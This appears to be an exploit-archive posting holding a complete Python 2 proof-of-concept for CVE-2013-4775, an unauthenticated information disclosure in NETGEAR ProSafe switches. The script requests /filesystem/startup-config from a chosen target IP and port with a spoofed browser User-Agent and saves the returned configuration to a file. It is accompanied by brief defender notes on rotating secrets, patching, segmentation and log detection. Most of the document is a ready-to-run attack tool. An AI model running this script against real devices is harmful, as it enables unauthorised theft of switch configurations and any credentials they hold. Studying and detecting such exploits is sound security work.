
Netgear ProSafe Information Disclosure Vulnerability Exploit

Posted on 23 August 2013

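"""Proof of concept for CVE-2013-4775 on NETGEAR ProSafe switches (Python 2).

The script sends one HTTP GET for /filesystem/startup-config to the admin
interface and saves the response body to a file. The request carries no
credentials, cookies or session token; a device that answers it with its
startup configuration is exposing that file to every host that can reach
the management port.

Notes for defenders:
  * If the request succeeds, treat any secrets stored in the startup
    configuration as exposed and rotate them.
  * Keep the HTTP admin interface reachable only from a management network
    and install the vendor firmware that addresses this CVE.
  * Requests for /filesystem/startup-config seen in proxy, firewall or IDS
    logs from hosts that are not administration workstations are a useful
    detection signal.
"""

import getopt
import os
import sys
import urllib2

__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"

# Usage text shared by help() and the argument-validation error path.
_USAGE = """
Usage: python CVE-2013-4775.py [mandatory options]

Mandatory options:
    -t target    ...Target IP address
    -p port      ...Port where the HTTP admin interface is listening on
    -o file      ...Output file where the config will be written to

Example:
    python CVE-2013-4775.py -t 192.168.0.1 -p 80 -o output.txt
"""


def header():
    """Print the banner with the PoC title and the author."""
    print ""
    print " ================================================================= "
    # The title has no placeholder, so the former .format(__version__) call
    # on this line did nothing and has been dropped.
    print "| Netgear ProSafe - CVE-2013-4775 PoC |"
    print "| by {0} |".format(__author__)
    print " ================================================================= "
    print ""


def _print_usage():
    """Print the banner followed by the usage text, without exiting."""
    header()
    print _USAGE


def help():
    """Print the banner and usage text, then exit with status 0.

    The name shadows the built-in help(); it is kept so existing callers
    keep working.
    """
    _print_usage()
    sys.exit(0)


if __name__ == '__main__':
    # Parse options
    try:
        options, args = getopt.getopt(sys.argv[1:], "t:p:o:",
                                      ["target=", "port=", "output="])
    except getopt.GetoptError as err:
        header()
        print " [-] Error: {0}. ".format(str(err))
        sys.exit(1)

    if not options:
        help()

    target = None
    port = None
    output = None

    for opt, arg in options:
        # ("-t") is a plain string, not a tuple, so the old test was a
        # substring match that never accepted the declared long options.
        if opt in ("-t", "--target"):
            target = arg
        elif opt in ("-p", "--port"):
            port = arg
        elif opt in ("-o", "--output"):
            output = arg

    # Option input validation
    if not target or not port or not output:
        # help() exits with status 0, which used to make the error message
        # and the non-zero exit status below unreachable.
        _print_usage()
        print "[-] Error: Incorrect syntax. \n"
        sys.exit(1)

    if not port.isdigit() or not 0 < int(port) < 65536:
        header()
        print "[-] Error: Port must be a number between 1 and 65535. "
        sys.exit(1)

    header()
    print "[+] Trying to connect to {0}:{1}...".format(target, port)
    headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"}

    status = 0
    try:
        # Get the startup config via HTTP admin interface. Only a User-Agent
        # header is sent; there is no authentication material in the request.
        r = urllib2.Request("http://%s:%s/filesystem/startup-config" % (target, port),
                            None, headers)
        startup_config = urllib2.urlopen(r).read()
        print "[+] Connected..."

        # Write results to output file. The retrieved configuration may hold
        # credential material, so a newly created file is readable by its
        # owner only (the mode does not change an already existing file).
        print "[+] Writing startup config to {0}... ".format(output)
        fd = os.open(output, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        with os.fdopen(fd, 'w') as fw:
            fw.write(startup_config)
    except urllib2.URLError:
        # urllib2.HTTPError is a URLError subclass, so an HTTP error status
        # (for instance a device that rejects the request) also ends up here.
        print "[-] Error: The connection could not be established. "
        status = 1
    except EnvironmentError as e:
        # os.open raises OSError and file writes raise IOError; both derive
        # from EnvironmentError in Python 2.
        print "[-] Error: {0}... ".format(e.strerror)
        status = 1

    # Report failure to the calling shell instead of always exiting with 0.
    sys.exit(status)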

 
